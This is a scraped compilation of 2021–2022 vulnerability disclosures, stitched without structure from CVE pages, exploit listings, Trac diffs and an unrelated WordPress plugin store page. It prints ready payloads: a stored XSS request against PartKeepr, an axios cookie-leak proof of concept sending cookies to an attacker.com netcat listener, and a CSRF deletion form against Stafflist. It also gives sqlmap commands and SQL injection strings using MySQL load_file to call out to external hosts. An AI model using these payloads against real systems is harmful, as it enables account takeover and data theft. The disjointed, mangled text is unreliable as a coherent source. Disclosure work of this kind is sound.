Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter.

**Description**

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter

**Reproduction Steps**

Browsing to Edit tab, select project and add new project.  
There, insert the following payload <img src=x onerror=alert(1)> in name field.

The request performed is the following, being name the vulnerable parameter :

    POST /api/projects HTTP/1.1
    Host: partkeepr.vuln
    Cookie: PHPSESSID=fju4llfcogfr2q9ug1bl982117
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 303
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    {"name":"<img src=x onerror=alert(1)>","description":"","projectPartKeeprProjectBundleEntityProjectAttachments":[],"attachments":[],"projectPartKeeprProjectBundleEntityProjectParts":[],"parts":[],"projectPartKeeprProjectBundleEntityProjectRuns":[],"projectPartKeeprProjectBundleEntityReportProjects":[]}
    

Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers

Apart from **projects** , the following tabs are also vulnerable : **footprints**,**manufacturers**,**storage locations**, **distributors**, **part measurement units** , **units** and **batch jobs**

**System Information**

*   PartKeepr Version: 1.4.0
*   Operating System: LInux
*   Web Server: Apache
*   PHP Version: 7.4
*   Database and version: Mysql
*   Reproducible on the demo system: Yes

CVE-2021-39390: Stored XSS in PartKeepr · Issue #1237 · partkeepr/PartKeepr

Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository axios/axios prior to 0.26.

**BUG**

Cookie header leaked to third party site and it allow to hijack victim account

**SUMMURY**

When fetching a remote url with Cookie if it get Location response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.  
Ex: you try to fetch example.com with cookie and if it get redirect url to attacker.com then it fetch that redirect url with provided cookie .  
So, Cookie of example.com is leaked to attacker.com .  
Cookie is standard way to authentication into webapp and you should not leak to other site .  
All browser follow same-origin-policy so that when redirect happen browser does not send cookie of example.com to attacker.com .

**FLOW**

if you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .

First setup a webserver and a netcat listner

**http://mysite.com/redirect.php?url=http://attacker.com:8182/**

    //redirect.php
    <?php
    $url=$_GET["url"];
    header("Location: $url");
    
    /* Make sure that code below does not get executed when we redirect. */
    exit;
    ?>
    

**netcat listner in http://attacker.com**

nc -lnvp 8182

**STEP TO RERPODUCE**

run bellow axios code

    const axios = require('axios');
    
    // Make a request for a user with a given ID
    axios.get('http://mysite.com/redirect.php?url=http://attacker.com:8182/yy',{headers:{"Cookie":"dfdd=df"}})
      .then(function (response) {
        // handle success
        console.log(response);
      })
      .catch(function (error) {
        // handle error
        console.log(error);
      })
      .then(function () {
        // always executed
      });
    
    

response received in attacker netcat

    Connection from 127.0.0.1 36724 received!
    GET /yy HTTP/1.1
    Accept: application/json, text/plain, */*
    Cookie: dfdd=df
    User-Agent: axios/0.24.0
    Host: localhost:8182
    Connection: close
    
    

So, here i provided cookie for mysite.com but due to redirect it leaks to thirdparty site attacker.com

**SUGGESTED FIX**

If provided url domain and redirect url domain is same then you can only send cookie/authorization header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie/Authorization header.

CVE-2022-1214: Exposure of Sensitive Information to an Unauthorized Actor in axios

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in MyThemeShop WP Subscribe plugin <= 1.2.12 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

If you aren’t building an email list, you’re missing out on the most powerful and consistent way to drive repeat visitors and customers to your website or blog. With an email list, you become less and less dependent on external sources of traffic, and gain more ability to interact with your blog’s audience.

We at MyThemeShop understand your need, and have developed a unique, cleanly coded, premium subscription plugin. We are now distributing it for FREE to give back to the WordPress community. We have been given so much by the WordPress community, it’s time to give back.

**WP Subscribe** is the only plugin you need to get the perfect subscription forms on your website. With optimized code, it loads before you can even blink your eye. If you’re a website owner, you can make a lot more money than regular blogs, which is why so many marketers focus on creating email lists. With the WP Subscribe plugin, you can do it in a simple yet effective way. Install the plugin, configure the widget and convert visitors into loyal email subscribers.

**Live demos:**

See the WP Subscribe Plugin in action on our demo page: http://demo.mythemeshop.com/sociallyviral/

**Why choose WP Subscribe from MyThemeShop:**

*   It’s the only free all-in-one plugin which offers Aweber, Mailchimp and FeedBurner.
*   Choose between Mailchimp, Aweber or FeedBurner.
*   Options to change text showing in subscription box.
*   Fully responsive.
*   Can be easily customized using custom CSS.
*   Can be used more than once in different sidebars.
*   Super lightweight.
*   Compatible with caching and SEO plugins.
*   Eye-catching design.
*   Position it anywhere where a widget is configured in your theme.

**Support**

All support for this plugin is provided through our forums. If you have not registered yet, you can do so here for **FREE**  
https://mythemeshop.com/#signup

If after checking our Free WordPress video tutorials here:  
https://mythemeshop.com/wordpress-101/  
&  
https://community.mythemeshop.com/tutorials/category/2-free-video-tutorials/

you are still stuck, please feel free to open a new thread, and a member of our support team will be happy to help.

Support link:  
https://community.mythemeshop.com/forum/11-free-plugin-support/

**Help to make it better**

MyThemeShop is a premium WordPress theme provider, and we develop premium plugins in our free time and distribute them for free to give back to the community. Though we take a lot of care while developing anything, we might have missed something useful or important. Please help us make it better by submitting your bug/suggestions/feedback on GitHub.

GitHub link: https://github.com/MyThemeShop/WP-Subscribe/

**Feedback**

If you like this plugin, then please leave us a good rating and review.  
Consider following us on Google+, Twitter, and Facebook

This section describes how to install the plugin and get it working.

1.  Upload the wp-subscribe folder to the to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  You can see **WP Subscribe** widget in widgets section.
4.  Add it in sidebar and footer and configure as you want.
5.  Enjoy!

**Plugin is not working**

Please disable all plugins and check if plugin is working properly. Then you can enable all plugins one by one to find out which plugin is conflicting with WP Subscribe.

Plugin doesnt work anymore on the newest versions of Wordpress. It's a pity, it was a great plugin!

Simple and works, thanks.

Support 0, the plugin removal working only direct na manual from wp folder !

Plugin works great, and the support team is AWESOME! They helped me customize the plugin for two of my websites.

It needs ID from feedburner, mailchip, aweber. If you don't use them, it wont work. Ability to use my hosting service wiill be good. Bacause my website gets very few hits. I cannot afford to use others services. It is better if the plugin is self contained rather than depending on others to deliver emails.

Read all 25 reviews

“WP Subscribe” is open source software. The following people have contributed to this plugin.

Contributors

*    MyThemeShop

**1.2.12**

*   Improved form accessibility

**1.2.11**

*   Added validation for name and email fields

**1.2.10**

*   Changed admin notices

**1.2.9**

*   Updated admin notices

**1.2.8**

*   Added consent field

**1.2.7**

*   Fixed SVN issue

**1.2.6**

*   Fixed PHP notices

**1.2.5**

*   Fixed aweber list issue

**1.2.4**

*   Fixed aweber issues

**1.2.3**

*   Fixed some CSS issues

**1.2.2**

*   Fixed some javascript issues
*   Fixed some credentials in Aweber
*   Improve Mailchimp class
*   Remove notices and warnings on some places
*   Change the behavior of saving mailing service lists

**1.2.1**

*   Provided backward compatibility for CSS
*   Provided backward compatibility for Scoped CSS
*   Remove magnific popup classes from inline form
*   Add loader when submitting form
*   Fixed inline form responsiveness
*   Minify the CSS File

**1.2.0**

*   Whole plugin is re-written in OOP
*   Huge performance Improvements
*   Moved JS and CSS folders inside assets folder
*   Enhanced: Functions are more organized in wps-helpers and wps-functions-options file.
*   Fixed: Missing and in-correct textdomain

**1.1.4**

*   Changed AWeber form URL to HTTPS

**1.1.3**

*   Added option to enable name field
*   Added MyThemeShop tab in “Add Plugins” page

**1.1.2**

*   Removed nonce from frontend

**1.1.0**

*   Replaced Feedburner HTTP link with HTTPS

**1.0.9**

*   Fixed spelling mistake in Pro Notification

**1.0.8**

*   Fixed translation and text domain issue

**1.0.7**

*   Fixed notification closing issue

**1.0.6**

*   Switched to PHP 5 style constructor method for the widget class

**1.0.5**

*   Improvement – input placeholder text hides on click.

**1.0.4**

*   Fixed AWeber signup issue

**1.0.3**

*   Fixed add\_query\_arg vulnerability

**1.0.2**

*   Added double opt-in possibility for Mailchimp

**1.0.1**

*   Fixed Title field saving issue in newly added widget
*   Fixed compatibility with other plugins using Mailchimp API

**1.0**

*   Official plugin release.

CVE-2021-36844: WP Subscribe

The Photo Gallery WordPress plugin through 1.6.3 does not properly escape the $_POST['filter_tag'] parameter, which is appended to an SQL query, making SQL Injection attacks possible.

File:

  

*   photo-gallery/trunk/frontend/models/BWGModelGalleryBox.php (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **photo-gallery/trunk/frontend/models/BWGModelGalleryBox.php**
    
    r2587758
    
    r2706797
    
     
    
    43
    
    43
    
          $bwg\_filter\_tag\_temp = WDWLibrary::get('filter\_tag\_' . $bwg, 0);
    
    44
    
    44
    
          if ( !empty($bwg\_filter\_tag\_temp) ) {
    
    45
    
     
    
            $filter\_tags = explode(",", $bwg\_filter\_tag\_temp);
    
     
    
    45
    
            $filter\_tags = array\_map('intval', explode(",", $bwg\_filter\_tag\_temp));
    
    46
    
    46
    
          }
    
    47
    
    47
    
        }
    
    48
    
    48
    
        else {
    
    49
    
     
    
          $filter\_tags = explode(",", $bwg\_filter\_tag\_temp);
    
     
    
    49
    
          $filter\_tags = array\_map('intval', explode(",", $bwg\_filter\_tag\_temp));
    
    50
    
    50
    
        }
    
    51
    
    51
    
    …
    
    …
    
     
    
    111
    
    111
    
              $join .= ' LEFT JOIN (SELECT GROUP\_CONCAT(tag\_id order by tag\_id SEPARATOR ",") AS tags\_combined, image\_id FROM  ' . $wpdb->prefix . 'bwg\_image\_tag GROUP BY image\_id) AS tags ON image.id=tags.image\_id';
    
    112
    
    112
    
          }
    
    113
    
     
    
          $where .= ' AND CONCAT(",", tags.tags\_combined, ",") REGEXP ",(' . implode($compare\_sign, $filter\_tags) . ')," ';
    
     
    
    113
    
          $where .= ' AND CONCAT(",", tags.tags\_combined, ",") REGEXP ",( %s )," ';
    
     
    
    114
    
          $prepareArgs\[\] = implode($compare\_sign, $filter\_tags);
    
    114
    
    115
    
        }
    
    115
    
    116
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-1281: Diff [2587758:2706797] for photo-gallery/trunk/frontend/models/BWGModelGalleryBox.php – WordPress Plugin Repository

The Import WP WordPress plugin before 2.4.6 does not validate the imported file in some cases, allowing high privilege users such as admin to upload arbitrary files (such as PHP), leading to RCE

CVE-2022-1273

The Ad Invalid Click Protector (AICP) WordPress plugin before 1.2.7 does not have CSRF check deleting banned users, which could allow attackers to make a logged in admin remove arbitrary bans

Timestamp:

04/05/2022 12:27:06 PM (4 weeks ago)

isaumya

Message:

Adding nonce support for deletion of banned users  

Location:

ad-invalid-click-protector/trunk/inc

Files:

  

*   admin\_setup.php (1 diff)
*   banned\_user\_table.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **ad-invalid-click-protector/trunk/inc/admin\_setup.php**
    
    r2656496
    
    r2705068
    
     
    
    523
    
    523
    
                $bannedUserTableOBJ = new AICP\_BANNED\_USER\_TABLE();
    
    524
    
    524
    
                $aicpOBJ = new AICP();
    
    525
    
     
    
                if( 'delete'=== $bannedUserTableOBJ->current\_action() ) {
    
    526
    
     
    
                    global $wpdb;
    
    527
    
     
    
                    $fetchedID = $\_REQUEST\['id'\];
    
    528
    
     
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
    529
    
     
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
    530
    
     
    
                    } else { //for singel delete just the id will return
    
    531
    
     
    
                                $selectedID = '%d';
    
    532
    
     
    
                    }
    
    533
    
     
    
                    if( empty( $selectedID ) ) {
    
    534
    
     
    
                        $this->delete\_notice( false );
    
    535
    
     
    
                    } else {
    
    536
    
     
    
                        $query = $wpdb->prepare(
    
    537
    
     
    
                                    "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
    538
    
     
    
                                    $fetchedID
    
    539
    
     
    
                                );
    
    540
    
     
    
                        $wpdb->query( $query );
    
    541
    
     
    
                        $this->delete\_notice( true );
    
    542
    
     
    
                    }
    
    543
    
     
    
                }
    
    544
    
     
    
                /\* End of handelling the deletion process \*/
    
    545
    
     
    
                /\* Now it's time to show our data \*/
    
     
    
    525
    
                if( ( 'delete'=== $bannedUserTableOBJ->current\_action() ) && isset( $\_REQUEST\['nonce'\] ) && wp\_verify\_nonce( $\_REQUEST\['nonce'\], 'delete\_banned\_user' ) ) {
    
     
    
    526
    
                    global $wpdb;
    
     
    
    527
    
                    $fetchedID = $\_REQUEST\['id'\];
    
     
    
    528
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
     
    
    529
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
     
    
    530
    
                    } else { //for singel delete just the id will return
    
     
    
    531
    
                        $selectedID = '%d';
    
     
    
    532
    
                    }
    
     
    
    533
    
                    if( empty( $selectedID ) ) {
    
     
    
    534
    
                        $this->delete\_notice( false );
    
     
    
    535
    
                    } else {
    
     
    
    536
    
                        $query = $wpdb->prepare(
    
     
    
    537
    
                            "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
     
    
    538
    
                            $fetchedID
    
     
    
    539
    
                        );
    
     
    
    540
    
                        $wpdb->query( $query );
    
     
    
    541
    
                $this->delete\_notice( true );
    
     
    
    542
    
                    }
    
     
    
    543
    
                }
    
     
    
    544
    
                /\* End of handelling the deletion process \*/
    
     
    
    545
    
                /\* Now it's time to show our data \*/
    
    546
    
    546
    
                ?>
    
    547
    
    547
    
                <div class="wrap">
    
*   **ad-invalid-click-protector/trunk/inc/banned\_user\_table.php**
    
    r1565011
    
    r2705068
    
     
    
    34
    
    34
    
            public function column\_ip( $item ) {
    
    35
    
    35
    
                $actions = array(
    
    36
    
     
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id ),
    
     
    
    36
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s&nonce=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id, wp\_create\_nonce( 'delete\_banned\_user' ) ),
    
    37
    
    37
    
                );
    
    38
    
    38
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0191: Changeset 2705068 – WordPress Plugin Repository

WordPress Stafflist plugin version 3.1.2 suffers from a cross site request forgery vulnerability.

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A CSRF vulnerability exists in staff record remove functionality inWordPress Plugin Stafflist 3.1.2.This vulnerability allows an attacker to delete existing records bytriggring a CSRF html request, due to not validating wp_nouce token inthe request.# ExploitAs n authenticated user:<html>  <body>    <form action="http://localhost:10003/wp-admin/admin.php">      <input type="hidden" name="page" value="stafflist" />      <input type="hidden" name="remove" value="1" />      <input type="hidden" name="p" value="1" />      <input type="hidden" name="s" value="1" />      <input type="submit" value="Submit request" />    </form>  </body></html>

WordPress Stafflist 3.1.2 Cross Site Request Forgery

WordPress Stafflist plugin version 3.1.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection(Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable Code:$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?...  $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR      LOWER(firstname) LIKE '%{$w}%' OR      LOWER(department)  LIKE '%{$w}%' OR      LOWER(email) LIKE '%{$w}%'" : "");# Vulnerable URLhttp://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]# POC```sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'--cookie="wordpress_cookies_paste_here"```# POC Imagehttps://prnt.sc/AECcFRHhe2ib

WordPress Stafflist 3.1.2 SQL Injection

Covid 19 Travel Pass Management System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Covid 19 Travel Pass Management System  v1.0 SQLi## Author: nu11secur1ty## Date: 05.01.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management## Description:The `code` parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+'was submitted in the code parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: code (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: page=view_pass&code=775545'+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''OR NOT 7325=7325 AND 'vRQn'='vRQn    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: page=view_pass&code=775545'+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x7171707071,(SELECT(ELT(1607=1607,1))),0x7176707171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HjrM'='HjrM    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=view_pass&code=775545'+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''AND (SELECT 2775 FROM (SELECT(SLEEP(5)))lkxH) AND 'bdqR'='bdqR    Type: UNION query    Title: MySQL UNION query (NULL) - 10 columns    Payload: page=view_pass&code=775545'+(selectload_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''UNION ALL SELECTNULL,CONCAT(0x7171707071,0x584d675163465844744f504c484d4256425463675863674948566f6b68474f464f64634e6b5a596a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management)## Proof and Exploit:[href](https://streamable.com/huye3b)

Covid 19 Travel Pass Management System 1.0 SQL Injection

Toll Tax Management System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Toll Tax Management System v1.0 SQLi## Author: nu11secur1ty## Date: 04.07.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'was submitted in the id parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take administrator account control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: id (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''RLIKE (SELECT (CASE WHEN (5512=5512) THEN 0x31+(selectload_file(0x5c5c5c5c6f6b63316837336d766b6b727978386c627869633479647066676c39393461733176706d636330312e6e616d61696b6174697075746b6174615f747570616b6f2e6e65745c5c777a6d))+''ELSE 0x28 END)) AND 'XhmU'='XhmU    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''OR (SELECT 2787 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT(ELT(2787=2787,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CIPJ'='CIPJ    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''AND (SELECT 6043 FROM (SELECT(SLEEP(5)))rrdD) AND 'XHBJ'='XHBJ    Type: UNION query    Title: MySQL UNION query (NULL) - 6 columns    Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''UNION ALL SELECTCONCAT(0x716a7a7a71,0x5346494143536a6c474b6b47466d494770794552614258734b42674c475945726d5a757674474b73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System)## Proof and Exploit:[href](https://streamable.com/y9xo4q)

Tag

#php